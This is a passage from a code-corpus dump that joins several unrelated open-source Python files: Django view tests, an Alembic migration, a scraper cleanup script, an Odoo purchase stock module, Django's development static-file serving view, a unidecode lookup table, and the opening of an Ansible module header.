self.view.request.method = 'GET'
response = self.view.get(self.view.request)
ok_('stage_form__preview' in response.context_data)
ok_('task_form' in response.context_data)
ok_('batch_form' in response.context_data)
ok_('criterion_formset' in response.context_data)
def test_fill_stage_after_get_request(self):
""" A GET request to ImportTasksView always yields the
'fill' stage (i.e. user is entering form data)
"""
self.view.request.method = 'GET'
self.view.get(self.view.request)
eq_(self.view.stage, 'fill')
def test_form_template_after_get_request(self):
""" A GET request to the ImportTasksView always yields the
form.html template stage (i.e. user is entering form data)
"""
self.view.request.method = 'GET'
response = self.view.get(self.view.request)
eq_(response.template_name, ['tasks/form.html'])
def test_fill_stage_after_preview_form_invalid(self):
""" Submitting an invalid form to 'preview' is always followed by being
in the "fill" stage (i.e. user must correct form data)
"""
bad_forms = {'form': Mock()}
bad_forms['form'].is_valid.return_value = False
with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
get_forms.return_value = bad_forms
self.view.request.method = 'POST'
self.view.request.POST = {'stage': 'preview'}
self.view.post(self.view.request)
eq_(self.view.stage, 'fill')
def test_confirmation_template_after_post_and_preview(self):
""" A POST request to ImportTasksView with stage=preview
and all forms valid leads to the confirmation.html
template.
"""
forms = {'batch_form': Mock(spec=TaskImportBatchForm),
'task_form': Mock(spec=TaskForm)}
forms['batch_form'].is_valid.return_value = True
forms['batch_form'].cleaned_data = {'_fresh_bugs': ''}
forms['task_form'].is_valid.return_value = True
forms['task_form'].cleaned_data = {'name': ''}
with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
get_forms.return_value = forms
self.view.request.method = 'POST'
self.view.request.POST = {'stage': 'preview'}
response = self.view.post(self.view.request)
eq_(response.template_name, ['tasks/confirmation.html'])
def test_form_template_after_post_and_fill(self):
""" A POST request to ImportTasksView with stage=fill
and all forms valid leads to the form.html
template. (i.e. user is making changes after preview)
"""
good_forms = {'form': Mock()}
good_forms['form'].is_valid.return_value = True
with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
get_forms.return_value = good_forms
self.view.request.method = 'POST'
self.view.request.POST = {'stage': 'fill'}
response = self.view.post(self.view.request)
eq_(response.template_name, ['tasks/form.html'])
def test_form_template_after_post_and_confirm(self):
""" A POST request to ImportTasksView with stage=confirm
and all forms valid leads to the tasks.list
"""
forms = {'batch_form': Mock(spec=TaskImportBatchForm),
'task_form': Mock(spec=TaskForm),
'criterion_formset': Mock(spec=TaskInvalidCriteriaFormSet)}
forms['batch_form'].is_valid.return_value = True
forms['batch_form'].cleaned_data = {'_fresh_bugs': ''}
forms['task_form'].is_valid.return_value = True
forms['task_form'].cleaned_data = {'name': '', 'keywords': ''}
forms['criterion_formset'].is_valid.return_value = True
forms['criterion_formset'].forms = []
with patch('oneanddone.tasks.views.ImportTasksView.get_forms') as get_forms:
with patch('oneanddone.tasks.views.redirect') as redirect:
get_forms.return_value = forms
self.view.request.method = 'POST'
self.view.request.POST = {'stage': 'confirm'}
eq_(self.view.post(self.view.request), redirect.return_value)
redirect.assert_called_with('tasks.list')
def test_create_batch_of_tasks(self):
def save_batch(user):
return TaskImportBatchFactory.create(creator=user)
def save_task(user, **kwargs):
return TaskFactory.create(creator=user)
user = UserFactory.create()
self.view.request = Mock(spec=HttpRequest,
_messages=Mock(),
user=user)
bugs = [{u'id': 51, u'summary': u'a'}, {u'id': 52, u'summary': u'b'}]
forms = {'batch_form': Mock(spec=TaskImportBatchForm),
'task_form': Mock(spec=TaskForm),
'criterion_formset': Mock(spec=TaskInvalidCriteriaFormSet)}
forms['batch_form'].cleaned_data = {'_fresh_bugs': bugs}
forms['batch_form'].save.side_effect = save_batch
forms['task_form'].save.side_effect = save_task
forms['task_form'].cleaned_data = {'keywords': 'foo, bar'}
forms['criterion_formset'].forms = [
Mock(
cleaned_data={'criterion': TaskInvalidationCriterionFactory.create()})
for i in range(2)]
self.view.done(forms)
batch = TaskImportBatch.objects.get(creator=user)
BugzillaBug.objects.get(bugzilla_id=51)
ok_(Task.objects.filter(creator=user,
batch=batch).exists())
eq_(Task.objects.filter(batch=batch).count(), len(bugs))
eq_(BugzillaBug.objects.count(), len(bugs))
eq_(batch.taskinvalidationcriterion_set.count(),
len(forms['criterion_formset'].forms))
eq_(sorted(Task.objects.filter(batch=batch)[0].keywords_list),
sorted(forms['task_form'].cleaned_data['keywords']))
| mpl-2.0 |
VinnieJohns/ggrc-core | src/ggrc/migrations/versions/20170222151635_2e049f7d3b0b_update_roles_in_options_table.py | 3 | 1132 | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""
update roles in options table
Create Date: 2017-02-13 06:00:17.987416
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
from alembic import op
# revision identifiers, used by Alembic.
revision = '19a4d5cfc0b8'
down_revision = '4e43a2374e2c'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
delete_sql = ("DELETE from options where role='product_kind'")
update_sql = ("UPDATE options set role='product_kind' "
"where role='product_type'")
op.execute(delete_sql)
op.execute(update_sql)
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
update_sql = ("UPDATE options set role='product_type' "
"where role='product_kind'")
insert_sql = ("INSERT INTO options (id,role,title,created_at,updated_at) "
"values(109,'product_kind','Not Applicable',NOW(),NOW())")
op.execute(update_sql)
op.execute(insert_sql)
| apache-2.0 |
fake-name/ReadableWebProxy | WebMirror/management/GravityTalesManage.py | 1 | 1202 |
import calendar
import datetime
import json
import os
import os.path
import shutil
import traceback
from concurrent.futures import ThreadPoolExecutor
import urllib.error
import urllib.parse
from sqlalchemy import and_
from sqlalchemy import or_
import sqlalchemy.exc
from sqlalchemy_continuum_vendored.utils import version_table
if __name__ == "__main__":
import logSetup
logSetup.initLogging()
import common.database as db
import common.Exceptions
import common.management.file_cleanup
import Misc.HistoryAggregator.Consolidate
import flags
import pprint
import config
from config import C_RAW_RESOURCE_DIR
import WebMirror.OutputFilters.rss.FeedDataParser
def exposed_delete_gravitytales_bot_blocked_pages():
'''
Delete the "checking you're not a bot" garbage pages
that sometimes get through the gravitytales scraper.
'''
with db.session_context() as sess:
tables = [
db.WebPages.__table__,
version_table(db.WebPages.__table__)
]
for ctbl in tables:
update = ctbl.delete() \
.where(ctbl.c.netloc == "gravitytales.com") \
.where(ctbl.c.content.like('%<div id="bot-alert" class="alert alert-info">%'))
print(update)
sess.execute(update)
sess.commit()
| bsd-3-clause |
idncom/odoo | addons/purchase/stock.py | 58 | 18545 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
class stock_move(osv.osv):
_inherit = 'stock.move'
_columns = {
'purchase_line_id': fields.many2one('purchase.order.line',
'Purchase Order Line', ondelete='set null', select=True,
readonly=True),
}
def get_price_unit(self, cr, uid, move, context=None):
""" Returns the unit price to store on the quant """
if move.purchase_line_id:
return move.price_unit
return super(stock_move, self).get_price_unit(cr, uid, move, context=context)
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
res = super(stock_move, self).write(cr, uid, ids, vals, context=context)
from openerp import workflow
if vals.get('state') in ['done', 'cancel']:
po_to_check = []
for move in self.browse(cr, uid, ids, context=context):
if move.purchase_line_id and move.purchase_line_id.order_id:
order = move.purchase_line_id.order_id
order_id = order.id
# update linked purchase order as superuser as the warehouse
# user may not have rights to access purchase.order
if self.pool.get('purchase.order').test_moves_done(cr, uid, [order_id], context=context):
workflow.trg_validate(SUPERUSER_ID, 'purchase.order', order_id, 'picking_done', cr)
if self.pool.get('purchase.order').test_moves_except(cr, uid, [order_id], context=context):
workflow.trg_validate(SUPERUSER_ID, 'purchase.order', order_id, 'picking_cancel', cr)
if order_id not in po_to_check and vals['state'] == 'cancel' and order.invoice_method == 'picking':
po_to_check.append(order_id)
# Some moves which are cancelled might be part of a PO line which is partially
# invoiced, so we check if some PO line can be set on "invoiced = True".
if po_to_check:
self.pool.get('purchase.order')._set_po_lines_invoiced(cr, uid, po_to_check, context=context)
return res
def copy(self, cr, uid, id, default=None, context=None):
default = default or {}
context = context or {}
if not default.get('split_from'):
#we don't want to propagate the link to the purchase order line except in case of move split
default['purchase_line_id'] = False
return super(stock_move, self).copy(cr, uid, id, default, context)
def _create_invoice_line_from_vals(self, cr, uid, move, invoice_line_vals, context=None):
if move.purchase_line_id:
invoice_line_vals['purchase_line_id'] = move.purchase_line_id.id
invoice_line_vals['account_analytic_id'] = move.purchase_line_id.account_analytic_id.id or False
invoice_line_id = super(stock_move, self)._create_invoice_line_from_vals(cr, uid, move, invoice_line_vals, context=context)
if move.purchase_line_id:
purchase_line = move.purchase_line_id
self.pool.get('purchase.order.line').write(cr, uid, [purchase_line.id], {
'invoice_lines': [(4, invoice_line_id)]
}, context=context)
self.pool.get('purchase.order').write(cr, uid, [purchase_line.order_id.id], {
'invoice_ids': [(4, invoice_line_vals['invoice_id'])],
})
purchase_line_obj = self.pool.get('purchase.order.line')
purchase_obj = self.pool.get('purchase.order')
invoice_line_obj = self.pool.get('account.invoice.line')
purchase_id = move.purchase_line_id.order_id.id
purchase_line_ids = purchase_line_obj.search(cr, uid, [('order_id', '=', purchase_id), ('invoice_lines', '=', False), '|', ('product_id', '=', False), ('product_id.type', '=', 'service')], context=context)
if purchase_line_ids:
inv_lines = []
for po_line in purchase_line_obj.browse(cr, uid, purchase_line_ids, context=context):
acc_id = purchase_obj._choose_account_from_po_line(cr, uid, po_line, context=context)
inv_line_data = purchase_obj._prepare_inv_line(cr, uid, acc_id, po_line, context=context)
inv_line_id = invoice_line_obj.create(cr, uid, inv_line_data, context=context)
inv_lines.append(inv_line_id)
po_line.write({'invoice_lines': [(4, inv_line_id)]})
invoice_line_obj.write(cr, uid, inv_lines, {'invoice_id': invoice_line_vals['invoice_id']}, context=context)
return invoice_line_id
def _get_master_data(self, cr, uid, move, company, context=None):
if context.get('inv_type') == 'in_invoice' and move.purchase_line_id:
purchase_order = move.purchase_line_id.order_id
return purchase_order.partner_id, purchase_order.create_uid.id, purchase_order.currency_id.id
if context.get('inv_type') == 'in_refund' and move.origin_returned_move_id.purchase_line_id:
purchase_order = move.origin_returned_move_id.purchase_line_id.order_id
return purchase_order.partner_id, purchase_order.create_uid.id, purchase_order.currency_id.id
elif context.get('inv_type') in ('in_invoice', 'in_refund') and move.picking_id:
# In case of an extra move, it is better to use the data from the original moves
for purchase_move in move.picking_id.move_lines:
if purchase_move.purchase_line_id:
purchase_order = purchase_move.purchase_line_id.order_id
return purchase_order.partner_id, purchase_order.create_uid.id, purchase_order.currency_id.id
partner = move.picking_id and move.picking_id.partner_id or False
code = self.get_code_from_locs(cr, uid, move, context=context)
if partner and partner.property_product_pricelist_purchase and code == 'incoming':
currency = partner.property_product_pricelist_purchase.currency_id.id
return partner, uid, currency
return super(stock_move, self)._get_master_data(cr, uid, move, company, context=context)
def _get_invoice_line_vals(self, cr, uid, move, partner, inv_type, context=None):
res = super(stock_move, self)._get_invoice_line_vals(cr, uid, move, partner, inv_type, context=context)
if inv_type == 'in_invoice' and move.purchase_line_id:
purchase_line = move.purchase_line_id
res['invoice_line_tax_id'] = [(6, 0, [x.id for x in purchase_line.taxes_id])]
res['price_unit'] = purchase_line.price_unit
elif inv_type == 'in_refund' and move.origin_returned_move_id.purchase_line_id:
purchase_line = move.origin_returned_move_id.purchase_line_id
res['invoice_line_tax_id'] = [(6, 0, [x.id for x in purchase_line.taxes_id])]
res['price_unit'] = purchase_line.price_unit
return res
def _get_moves_taxes(self, cr, uid, moves, inv_type, context=None):
is_extra_move, extra_move_tax = super(stock_move, self)._get_moves_taxes(cr, uid, moves, inv_type, context=context)
if inv_type == 'in_invoice':
for move in moves:
if move.purchase_line_id:
is_extra_move[move.id] = False
extra_move_tax[move.picking_id, move.product_id] = [(6, 0, [x.id for x in move.purchase_line_id.taxes_id])]
elif move.product_id.product_tmpl_id.supplier_taxes_id:
mov_id = self.search(cr, uid, [('purchase_line_id', '!=', False), ('picking_id', '=', move.picking_id.id)], limit=1, context=context)
if mov_id:
mov = self.browse(cr, uid, mov_id[0], context=context)
fp = mov.purchase_line_id.order_id.fiscal_position
res = self.pool.get("account.invoice.line").product_id_change(cr, uid, [], move.product_id.id, None, partner_id=move.picking_id.partner_id.id, fposition_id=(fp and fp.id), type='in_invoice', context=context)
extra_move_tax[0, move.product_id] = [(6, 0, res['value']['invoice_line_tax_id'])]
return (is_extra_move, extra_move_tax)
def attribute_price(self, cr, uid, move, context=None):
"""
Attribute price to move, important in inter-company moves or receipts with only one partner
"""
# The method attribute_price of the parent class sets the price to the standard product
# price if move.price_unit is zero. We don't want this behavior in the case of a purchase
# order since we can purchase goods which are free of charge (e.g. 5 units offered if 100
# are purchased).
if move.purchase_line_id:
return
code = self.get_code_from_locs(cr, uid, move, context=context)
if not move.purchase_line_id and code == 'incoming' and not move.price_unit:
partner = move.picking_id and move.picking_id.partner_id or False
price = False
# If partner given, search price in its purchase pricelist
if partner and partner.property_product_pricelist_purchase:
pricelist_obj = self.pool.get("product.pricelist")
pricelist = partner.property_product_pricelist_purchase.id
price = pricelist_obj.price_get(cr, uid, [pricelist],
move.product_id.id, move.product_uom_qty, partner.id, {
'uom': move.product_uom.id,
'date': move.date,
})[pricelist]
if price:
return self.write(cr, uid, [move.id], {'price_unit': price}, context=context)
super(stock_move, self).attribute_price(cr, uid, move, context=context)
def _get_taxes(self, cr, uid, move, context=None):
if move.origin_returned_move_id.purchase_line_id.taxes_id:
return [tax.id for tax in move.origin_returned_move_id.purchase_line_id.taxes_id]
return super(stock_move, self)._get_taxes(cr, uid, move, context=context)
class stock_picking(osv.osv):
_inherit = 'stock.picking'
def _get_to_invoice(self, cr, uid, ids, name, args, context=None):
res = {}
for picking in self.browse(cr, uid, ids, context=context):
res[picking.id] = False
for move in picking.move_lines:
if move.purchase_line_id and move.purchase_line_id.order_id.invoice_method == 'picking':
if not move.move_orig_ids:
res[picking.id] = True
return res
def _get_picking_to_recompute(self, cr, uid, ids, context=None):
picking_ids = set()
for move in self.pool.get('stock.move').browse(cr, uid, ids, context=context):
if move.picking_id and move.purchase_line_id:
picking_ids.add(move.picking_id.id)
return list(picking_ids)
_columns = {
'reception_to_invoice': fields.function(_get_to_invoice, type='boolean', string='Invoiceable on incoming shipment?',
help='Does the picking contains some moves related to a purchase order invoiceable on the receipt?',
store={
'stock.move': (_get_picking_to_recompute, ['purchase_line_id', 'picking_id'], 10),
}),
}
def _create_invoice_from_picking(self, cr, uid, picking, vals, context=None):
purchase_obj = self.pool.get("purchase.order")
purchase_line_obj = self.pool.get('purchase.order.line')
invoice_line_obj = self.pool.get('account.invoice.line')
invoice_id = super(stock_picking, self)._create_invoice_from_picking(cr, uid, picking, vals, context=context)
return invoice_id
def _get_invoice_vals(self, cr, uid, key, inv_type, journal_id, move, context=None):
inv_vals = super(stock_picking, self)._get_invoice_vals(cr, uid, key, inv_type, journal_id, move, context=context)
if move.purchase_line_id and move.purchase_line_id.order_id:
purchase = move.purchase_line_id.order_id
inv_vals.update({
'fiscal_position': purchase.fiscal_position.id,
'payment_term': purchase.payment_term_id.id,
})
return inv_vals
class stock_warehouse(osv.osv):
_inherit = 'stock.warehouse'
_columns = {
'buy_to_resupply': fields.boolean('Purchase to resupply this warehouse',
help="When products are bought, they can be delivered to this warehouse"),
'buy_pull_id': fields.many2one('procurement.rule', 'Buy rule'),
}
_defaults = {
'buy_to_resupply': True,
}
def _get_buy_pull_rule(self, cr, uid, warehouse, context=None):
route_obj = self.pool.get('stock.location.route')
data_obj = self.pool.get('ir.model.data')
try:
buy_route_id = data_obj.get_object_reference(cr, uid, 'purchase', 'route_warehouse0_buy')[1]
except:
buy_route_id = route_obj.search(cr, uid, [('name', 'like', _('Buy'))], context=context)
buy_route_id = buy_route_id and buy_route_id[0] or False
if not buy_route_id:
raise osv.except_osv(_('Error!'), _('Can\'t find any generic Buy route.'))
return {
'name': self._format_routename(cr, uid, warehouse, _(' Buy'), context=context),
'location_id': warehouse.in_type_id.default_location_dest_id.id,
'route_id': buy_route_id,
'action': 'buy',
'picking_type_id': warehouse.in_type_id.id,
'warehouse_id': warehouse.id,
}
def create_routes(self, cr, uid, ids, warehouse, context=None):
pull_obj = self.pool.get('procurement.rule')
res = super(stock_warehouse, self).create_routes(cr, uid, ids, warehouse, context=context)
if warehouse.buy_to_resupply:
buy_pull_vals = self._get_buy_pull_rule(cr, uid, warehouse, context=context)
buy_pull_id = pull_obj.create(cr, uid, buy_pull_vals, context=context)
res['buy_pull_id'] = buy_pull_id
return res
def write(self, cr, uid, ids, vals, context=None):
pull_obj = self.pool.get('procurement.rule')
if isinstance(ids, (int, long)):
ids = [ids]
if 'buy_to_resupply' in vals:
if vals.get("buy_to_resupply"):
for warehouse in self.browse(cr, uid, ids, context=context):
if not warehouse.buy_pull_id:
buy_pull_vals = self._get_buy_pull_rule(cr, uid, warehouse, context=context)
buy_pull_id = pull_obj.create(cr, uid, buy_pull_vals, context=context)
vals['buy_pull_id'] = buy_pull_id
else:
for warehouse in self.browse(cr, uid, ids, context=context):
if warehouse.buy_pull_id:
buy_pull_id = pull_obj.unlink(cr, uid, warehouse.buy_pull_id.id, context=context)
return super(stock_warehouse, self).write(cr, uid, ids, vals, context=None)
def get_all_routes_for_wh(self, cr, uid, warehouse, context=None):
all_routes = super(stock_warehouse, self).get_all_routes_for_wh(cr, uid, warehouse, context=context)
if warehouse.buy_to_resupply and warehouse.buy_pull_id and warehouse.buy_pull_id.route_id:
all_routes += [warehouse.buy_pull_id.route_id.id]
return all_routes
def _get_all_products_to_resupply(self, cr, uid, warehouse, context=None):
res = super(stock_warehouse, self)._get_all_products_to_resupply(cr, uid, warehouse, context=context)
if warehouse.buy_pull_id and warehouse.buy_pull_id.route_id:
for product_id in res:
for route in self.pool.get('product.product').browse(cr, uid, product_id, context=context).route_ids:
if route.id == warehouse.buy_pull_id.route_id.id:
res.remove(product_id)
break
return res
def _handle_renaming(self, cr, uid, warehouse, name, code, context=None):
res = super(stock_warehouse, self)._handle_renaming(cr, uid, warehouse, name, code, context=context)
pull_obj = self.pool.get('procurement.rule')
#change the buy pull rule name
if warehouse.buy_pull_id:
pull_obj.write(cr, uid, warehouse.buy_pull_id.id, {'name': warehouse.buy_pull_id.name.replace(warehouse.name, name, 1)}, context=context)
return res
def change_route(self, cr, uid, ids, warehouse, new_reception_step=False, new_delivery_step=False, context=None):
res = super(stock_warehouse, self).change_route(cr, uid, ids, warehouse, new_reception_step=new_reception_step, new_delivery_step=new_delivery_step, context=context)
if warehouse.in_type_id.default_location_dest_id != warehouse.buy_pull_id.location_id:
self.pool.get('procurement.rule').write(cr, uid, warehouse.buy_pull_id.id, {'location_id': warehouse.in_type_id.default_location_dest_id.id}, context=context)
return res
| agpl-3.0 |
amith01994/intellij-community | python/lib/Lib/site-packages/django/contrib/staticfiles/views.py | 71 | 6101 | """
Views and functions for serving static files. These are only to be used during
development, and SHOULD NOT be used in a production setting.
"""
import mimetypes
import os
import posixpath
import re
import stat
import urllib
from email.Utils import parsedate_tz, mktime_tz
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import Http404, HttpResponse, HttpResponseRedirect, HttpResponseNotModified
from django.template import loader, Template, Context, TemplateDoesNotExist
from django.utils.http import http_date
from django.contrib.staticfiles import finders, utils
def serve(request, path, document_root=None, show_indexes=False, insecure=False):
"""
Serve static files below a given point in the directory structure or
from locations inferred from the static files finders.
To use, put a URL pattern such as::
(r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve')
in your URLconf.
If you provide the ``document_root`` parameter, the file won't be looked
up with the staticfiles finders, but in the given filesystem path, e.g.::
(r'^(?P<path>.*)$', 'django.contrib.staticfiles.views.serve', {'document_root' : '/path/to/my/files/'})
You may also set ``show_indexes`` to ``True`` if you'd like to serve a
basic index of the directory. This index view will use the
template hardcoded below, but if you'd like to override it, you can create
a template called ``static/directory_index.html``.
"""
if not settings.DEBUG and not insecure:
raise ImproperlyConfigured("The view to serve static files can only "
"be used if the DEBUG setting is True or "
"the --insecure option of 'runserver' is "
"used")
if not document_root:
absolute_path = finders.find(path)
if not absolute_path:
raise Http404('"%s" could not be found' % path)
document_root, path = os.path.split(absolute_path)
# Clean up given path to only allow serving files below document_root.
path = posixpath.normpath(urllib.unquote(path))
path = path.lstrip('/')
newpath = ''
for part in path.split('/'):
if not part:
# Strip empty path components.
continue
drive, part = os.path.splitdrive(part)
head, part = os.path.split(part)
if part in (os.curdir, os.pardir):
# Strip '.' and '..' in path.
continue
newpath = os.path.join(newpath, part).replace('\\', '/')
if newpath and path != newpath:
return HttpResponseRedirect(newpath)
fullpath = os.path.join(document_root, newpath)
if os.path.isdir(fullpath):
if show_indexes:
return directory_index(newpath, fullpath)
raise Http404("Directory indexes are not allowed here.")
if not os.path.exists(fullpath):
raise Http404('"%s" does not exist' % fullpath)
# Respect the If-Modified-Since header.
statobj = os.stat(fullpath)
mimetype, encoding = mimetypes.guess_type(fullpath)
mimetype = mimetype or 'application/octet-stream'
if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
statobj[stat.ST_MTIME], statobj[stat.ST_SIZE]):
return HttpResponseNotModified(mimetype=mimetype)
contents = open(fullpath, 'rb').read()
response = HttpResponse(contents, mimetype=mimetype)
response["Last-Modified"] = http_date(statobj[stat.ST_MTIME])
response["Content-Length"] = len(contents)
if encoding:
response["Content-Encoding"] = encoding
return response
DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>Index of {{ directory }}</title>
</head>
<body>
<h1>Index of {{ directory }}</h1>
<ul>
{% ifnotequal directory "/" %}
<li><a href="../">../</a></li>
{% endifnotequal %}
{% for f in file_list %}
<li><a href="{{ f|urlencode }}">{{ f }}</a></li>
{% endfor %}
</ul>
</body>
</html>
"""
def directory_index(path, fullpath):
try:
t = loader.select_template(['static/directory_index.html',
'static/directory_index'])
except TemplateDoesNotExist:
t = Template(DEFAULT_DIRECTORY_INDEX_TEMPLATE, name='Default directory index template')
files = []
for f in os.listdir(fullpath):
if not f.startswith('.'):
if os.path.isdir(os.path.join(fullpath, f)):
f += '/'
files.append(f)
c = Context({
'directory' : path + '/',
'file_list' : files,
})
return HttpResponse(t.render(c))
def was_modified_since(header=None, mtime=0, size=0):
"""
Was something modified since the user last downloaded it?
header
This is the value of the If-Modified-Since header. If this is None,
I'll just return True.
mtime
This is the modification time of the item we're talking about.
size
This is the size of the item we're talking about.
"""
try:
if header is None:
raise ValueError
matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
re.IGNORECASE)
header_date = parsedate_tz(matches.group(1))
if header_date is None:
raise ValueError
header_mtime = mktime_tz(header_date)
header_len = matches.group(3)
if header_len and int(header_len) != size:
raise ValueError
if mtime > header_mtime:
raise ValueError
except (AttributeError, ValueError, OverflowError):
return True
return False
| apache-2.0 |
HesselTjeerdsma/Cyber-Physical-Pacman-Game | Algor/flask/lib/python2.7/site-packages/unidecode/x0fb.py | 252 | 3838 | data = (
'ff', # 0x00
'fi', # 0x01
'fl', # 0x02
'ffi', # 0x03
'ffl', # 0x04
'st', # 0x05
'st', # 0x06
'[?]', # 0x07
'[?]', # 0x08
'[?]', # 0x09
'[?]', # 0x0a
'[?]', # 0x0b
'[?]', # 0x0c
'[?]', # 0x0d
'[?]', # 0x0e
'[?]', # 0x0f
'[?]', # 0x10
'[?]', # 0x11
'[?]', # 0x12
'mn', # 0x13
'me', # 0x14
'mi', # 0x15
'vn', # 0x16
'mkh', # 0x17
'[?]', # 0x18
'[?]', # 0x19
'[?]', # 0x1a
'[?]', # 0x1b
'[?]', # 0x1c
'yi', # 0x1d
'', # 0x1e
'ay', # 0x1f
'`', # 0x20
'', # 0x21
'd', # 0x22
'h', # 0x23
'k', # 0x24
'l', # 0x25
'm', # 0x26
'm', # 0x27
't', # 0x28
'+', # 0x29
'sh', # 0x2a
's', # 0x2b
'sh', # 0x2c
's', # 0x2d
'a', # 0x2e
'a', # 0x2f
'', # 0x30
'b', # 0x31
'g', # 0x32
'd', # 0x33
'h', # 0x34
'v', # 0x35
'z', # 0x36
'[?]', # 0x37
't', # 0x38
'y', # 0x39
'k', # 0x3a
'k', # 0x3b
'l', # 0x3c
'[?]', # 0x3d
'l', # 0x3e
'[?]', # 0x3f
'n', # 0x40
'n', # 0x41
'[?]', # 0x42
'p', # 0x43
'p', # 0x44
'[?]', # 0x45
'ts', # 0x46
'ts', # 0x47
'r', # 0x48
'sh', # 0x49
't', # 0x4a
'vo', # 0x4b
'b', # 0x4c
'k', # 0x4d
'p', # 0x4e
'l', # 0x4f
'', # 0x50
'', # 0x51
'', # 0x52
'', # 0x53
'', # 0x54
'', # 0x55
'', # 0x56
'', # 0x57
'', # 0x58
'', # 0x59
'', # 0x5a
'', # 0x5b
'', # 0x5c
'', # 0x5d
'', # 0x5e
'', # 0x5f
'', # 0x60
'', # 0x61
'', # 0x62
'', # 0x63
'', # 0x64
'', # 0x65
'', # 0x66
'', # 0x67
'', # 0x68
'', # 0x69
'', # 0x6a
'', # 0x6b
'', # 0x6c
'', # 0x6d
'', # 0x6e
'', # 0x6f
'', # 0x70
'', # 0x71
'', # 0x72
'', # 0x73
'', # 0x74
'', # 0x75
'', # 0x76
'', # 0x77
'', # 0x78
'', # 0x79
'', # 0x7a
'', # 0x7b
'', # 0x7c
'', # 0x7d
'', # 0x7e
'', # 0x7f
'', # 0x80
'', # 0x81
'', # 0x82
'', # 0x83
'', # 0x84
'', # 0x85
'', # 0x86
'', # 0x87
'', # 0x88
'', # 0x89
'', # 0x8a
'', # 0x8b
'', # 0x8c
'', # 0x8d
'', # 0x8e
'', # 0x8f
'', # 0x90
'', # 0x91
'', # 0x92
'', # 0x93
'', # 0x94
'', # 0x95
'', # 0x96
'', # 0x97
'', # 0x98
'', # 0x99
'', # 0x9a
'', # 0x9b
'', # 0x9c
'', # 0x9d
'', # 0x9e
'', # 0x9f
'', # 0xa0
'', # 0xa1
'', # 0xa2
'', # 0xa3
'', # 0xa4
'', # 0xa5
'', # 0xa6
'', # 0xa7
'', # 0xa8
'', # 0xa9
'', # 0xaa
'', # 0xab
'', # 0xac
'', # 0xad
'', # 0xae
'', # 0xaf
'', # 0xb0
'', # 0xb1
'[?]', # 0xb2
'[?]', # 0xb3
'[?]', # 0xb4
'[?]', # 0xb5
'[?]', # 0xb6
'[?]', # 0xb7
'[?]', # 0xb8
'[?]', # 0xb9
'[?]', # 0xba
'[?]', # 0xbb
'[?]', # 0xbc
'[?]', # 0xbd
'[?]', # 0xbe
'[?]', # 0xbf
'[?]', # 0xc0
'[?]', # 0xc1
'[?]', # 0xc2
'[?]', # 0xc3
'[?]', # 0xc4
'[?]', # 0xc5
'[?]', # 0xc6
'[?]', # 0xc7
'[?]', # 0xc8
'[?]', # 0xc9
'[?]', # 0xca
'[?]', # 0xcb
'[?]', # 0xcc
'[?]', # 0xcd
'[?]', # 0xce
'[?]', # 0xcf
'[?]', # 0xd0
'[?]', # 0xd1
'[?]', # 0xd2
'', # 0xd3
'', # 0xd4
'', # 0xd5
'', # 0xd6
'', # 0xd7
'', # 0xd8
'', # 0xd9
'', # 0xda
'', # 0xdb
'', # 0xdc
'', # 0xdd
'', # 0xde
'', # 0xdf
'', # 0xe0
'', # 0xe1
'', # 0xe2
'', # 0xe3
'', # 0xe4
'', # 0xe5
'', # 0xe6
'', # 0xe7
'', # 0xe8
'', # 0xe9
'', # 0xea
'', # 0xeb
'', # 0xec
'', # 0xed
'', # 0xee
'', # 0xef
'', # 0xf0
'', # 0xf1
'', # 0xf2
'', # 0xf3
'', # 0xf4
'', # 0xf5
'', # 0xf6
'', # 0xf7
'', # 0xf8
'', # 0xf9
'', # 0xfa
'', # 0xfb
'', # 0xfc
'', # 0xfd
'', # 0xfe
'', # 0xff
)
| apache-2.0 |
SteveHNH/ansible | lib/ansible/modules/network/avi/avi_tenant.py | 27 | 3806 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
